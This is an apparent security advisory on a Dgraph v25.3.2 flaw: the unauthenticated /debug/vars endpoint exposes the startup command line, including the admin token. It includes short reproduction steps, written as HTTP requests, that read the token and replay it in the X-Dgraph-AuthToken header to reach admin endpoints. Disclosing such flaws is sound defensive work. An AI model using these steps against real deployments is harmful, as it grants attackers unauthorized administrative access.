Dgraph v25.3.2 still exposes the process command line through the unauthenticated /debug/vars endpoint on Alpha. Because the admin token is commonly supplied via the --security "token=..." startup flag, an unauthenticated attacker can retrieve that token and replay it in the X-Dgraph-AuthToken header to access admin-only endpoints.
This is a variant of the previously fixed /debug/pprof/cmdline issue, but the current fix is incomplete because it blocks only /debug/pprof/cmdline and still serves http.DefaultServeMux, which includes expvar's /debug/vars handler.
Alpha still exposes Go's default HTTP mux:
x/metrics.go
expvarConf = expvar.NewMap("dgraph_config")expvar package automatically registers /debug/varsexpvar publishes:
cmdline = os.Argsmemstats = runtime.MemstatsAlpha's HTTP handler explicitly blocks only the old CVE path:
dgraph/cmd/alpha/run.go
if r.URL.Path == "/debug/pprof/cmdline" and returns 404http.DefaultServeMux.ServeHTTP(w, r)Admin endpoints still trust the leaked token:
dgraph/cmd/alpha/admin.go
X-Dgraph-AuthTokenworker.Config.AuthToken
GET /debug/vars HTTP/1.1
Host: target:8080
Parse the JSON response and read the cmdline field.
Extract the admin token from the startup arguments, for example:
--security token=debug-vars-secret;
GET /admin/config/cache_mb HTTP/1.1
Host: target:8080
X-Dgraph-AuthToken: debug-vars-secret
This was reproduced against dgraph/dgraph:v25.3.2 in Docker.
Observed behavior:
/debug/vars leaked the configured tokenX-Dgraph-AuthToken successfully accessed /admin/config/cache_mb4096
It was verified that the old CVE path appears specifically patched in the same version:
/debug/pprof/cmdline returned 404 Not Found/debug/pprof/ remained reachableUnauthenticated attackers can obtain the Alpha admin token and gain unauthorized administrative access.
This enables privileged admin operations such as:
X-Dgraph-AuthTokenIn deployments where the Alpha HTTP port is reachable by untrusted parties, this is a practical authentication bypass to admin functionality.
{
"github_reviewed_at": "2026-04-24T16:15:28Z",
"nvd_published_at": "2026-04-24T19:17:14Z",
"github_reviewed": true,
"cwe_ids": [
"CWE-200"
],
"severity": "CRITICAL"
}